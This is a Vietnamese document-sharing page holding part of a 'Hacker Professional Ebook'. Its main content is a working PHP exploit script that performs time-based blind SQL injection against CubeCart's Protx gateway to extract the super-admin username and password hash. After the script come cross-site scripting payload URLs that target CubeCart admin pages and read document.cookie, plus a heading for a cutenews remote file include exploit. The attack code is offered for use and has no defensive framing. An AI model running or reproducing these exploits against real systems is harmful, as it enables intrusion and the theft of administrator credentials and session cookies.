1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 365 ppsx

6 57 0
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 6
Dung lượng 18,88 KB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

XSS Cross site scripting Code: http://[target]/[path_to_cubecart]/admin/filemanager/preview.php?file="> alertdocument.cookie http://[target]/[path_to_cubecart]/admin/filemanager/preview.

Trang 1

echo 'No response from proxy ';die;

}

}

fputs($ock,$packet);

if ($proxy=='') {

$html='';

while (!feof($ock)) {

$html.=fgets($ock);

}

}

else {

$html='';

while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {

$html.=fread($ock,1);

}

}

fclose($ock);

#debug

#echo "\r\n".$html;

}

$host=$argv[1];

$path=$argv[2];

$port=80;

$prefix="CubeCart_";

$delay_func="benchmark(2000000,sha1('suntzu'))";

$dt=0;

$proxy="";

for ($i=3; $i<$argc; $i++){

$temp=$argv[$i][0].$argv[$i][1];

if ($temp=="-p")

{

$port=str_replace("-p","",$argv[$i]);

}

if ($temp=="-P")

{

$proxy=str_replace("-P","",$argv[$i]);

Trang 2

}

if ($temp=="-T")

{

$prefix=str_replace("-T","",$argv[$i]);

}

if ($temp=="-a")

{

$delay_func="benchmark(".intval(str_replace("-a","",$argv[$i])).",sha1('suntzu'))";

}

if ($temp=="-s")

{

$delay_func="sleep(11)";

}

if ($temp=="-d")

{

$dt=1;

}

}

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error check the path!'; die;}

if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

if ($dt)

{

$packet ="GET

".$p."modules/gateway/Protx/confirmed.php?oid=".base64_encode("'")."&crypt=1 HTTP/1.0\r\n";

$packet.="Host: ".$host."\r\n";

$packet.="Connection: Close\r\n\r\n";

#echo quick_dump($packet);

sendpacketii($packet);

if (eregi("in your SQL syntax",$html))

{

$temp=explode("UPDATE ",$html);

$temp2=explode("sessions",$temp[1]);

$prefix=$temp2[0];

echo "prefix -> ".$prefix."\n";

}

Trang 3

}

$chars[0]=0;//null

$chars=array_merge($chars,range(48,57)); //numbers

$chars=array_merge($chars,range(97,102));//a-f letters

$j=1;$password="";

while (!strstr($password,chr(0)))

{

for ($i=0; $i<=255; $i++)

{

if (in_array($i,$chars))

{

$sql="999999%'/**/or/**/basket=(SELECT(IF((ASCII(SUBSTRING(password,"

$j.",1))=".$i."),".$delay_func.",0))/**/FROM/**/".$prefix."admin_users/**/WHE RE/**/isSuper=1)/*";

echo "sql -> ".$sql."\n";

$sql=base64_encode($sql);

echo "encoded -> ".$sql."\n";

$packet ="GET ".$p."modules/gateway/Protx/confirmed.php?oid=$sql&crypt=1 HTTP/1.0\r\n";

$packet.="Host: ".$host."\r\n";

$packet.="Connection: Close\r\n\r\n";

#echo quick_dump($packet);

usleep(2000000);

$starttime=time();

sendpacketii($packet);

$endtime=time();

echo "starttime -> ".$starttime."\n";

echo "endtime -> ".$endtime."\n";

$difftime=$endtime - $starttime;

echo "difftime -> ".$difftime."\n";

if ($difftime > 10) {$password.=chr($i);echo "password ->

".$password."[???]\n";sleep(1);break;}

}

if ($i==255) {die("Exploit failed ");}

}

$j++;

}

Trang 4

$j=1;$admin="";

while (!strstr($admin,chr(0)))

{

for ($i=0; $i<=255; $i++)

{

$sql="999999%'/**/or/**/basket=(SELECT(IF((ASCII(SUBSTRING(username,"

$j.",1))=".$i."),".$delay_func.",0))/**/FROM/**/".$prefix."admin_users/**/WHE RE/**/isSuper=1)/*";

echo "sql -> ".$sql."\n";

$sql=base64_encode($sql);

echo "encoded -> ".$sql."\n";

$packet ="GET ".$p."modules/gateway/Protx/confirmed.php?oid=$sql&crypt=1 HTTP/1.0\r\n";

$packet.="Host: ".$host."\r\n";

$packet.="Connection: Close\r\n\r\n";

#echo quick_dump($packet);

usleep(2000000);

$starttime=time();

sendpacketii($packet);

$endtime=time();

echo "starttime -> ".$starttime."\n";

echo "endtime -> ".$endtime."\n";

$difftime=$endtime - $starttime;

echo "difftime -> ".$difftime."\n";

if ($difftime > 10) {$admin.=chr($i);echo "admin ->

".$admin."[???]\n";sleep(1);break;}

if ($i==255) {die("Exploit failed ");}

}

$j++;

}

print_r('

-

admin -> '.$admin.'

password (md5) -> '.$password.'

-

');

function is_hash($hash)

{

if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}

Trang 5

else {return false;}

}

if (is_hash($password)) {echo "Exploit succeeded ";}

else {echo "Exploit failed ";}

?>

black_hat_cr(HCE)

CubeCart <= 3.0.11 SQL injection & cross site scripting

1 Sql injection >

Code:

http://retrogod.altervista.org/cubecart_3011_sql_mqg_bypass.html

2 XSS (Cross site scripting)

Code:

http://[target]/[path_to_cubecart]/admin/filemanager/preview.php?file=">

<script>alert(document.cookie)</script>

http://[target]/[path_to_cubecart]/admin/filemanager/preview.php?file=1&

x="><script>alert(document.cookie)</script>

http://[target]/[path_to_cubecart]/admin/filemanager/preview.php?file=1&

y="><script>alert(document.cookie)</script>

http://[target]/[path_to_cubecart]/admin/login.php?email="><script>alert

(document.cookie)</script>

black_hat_cr(HCE)

cutenews aj-fork <= 167f (cutepath) Remote File Include Vulnerability

Code:

===========================================================

================================================

Ngày đăng: 04/07/2014, 12:20

Xem thêm

TÀI LIỆU CÙNG NGƯỜI DÙNG

TÀI LIỆU LIÊN QUAN